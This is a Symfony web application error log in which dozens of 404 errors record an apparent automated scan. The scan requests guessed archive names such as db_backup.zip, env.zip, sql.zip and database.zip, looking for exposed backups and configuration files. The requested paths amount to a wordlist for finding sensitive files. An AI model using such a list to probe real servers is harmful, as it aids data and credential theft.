[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_4.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_4.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_5.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_5.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /audio.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /audio.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /resources.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /resources.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /gallery.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /gallery.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /files.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /files.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /webservices.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /webservices.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /content.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /content.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /restapi.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /restapi.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /photos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /photos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /toml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /toml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /apis.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /apis.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /application.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /application.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /old.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /old.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_yearly.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_yearly.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:35] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /clone.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /clone.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:36] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_3.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_3.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /duplicate.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /duplicate.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:37] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /Archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /Archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mirror.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mirror.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /conf.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /conf.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dotenv.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dotenv.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mariadb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mariadb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /db_backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /db_backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /database.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /database.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /services.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /services.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /soap.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /soap.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /microservice.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /microservice.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /mongodb.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /mongodb.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sqlite.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sqlite.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /xml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /xml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup_1.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup_1.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /dump.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /dump.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /archive.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /archive.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /settings.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /settings.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /postgres.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /postgres.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 06:23:38] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /data.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /data.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
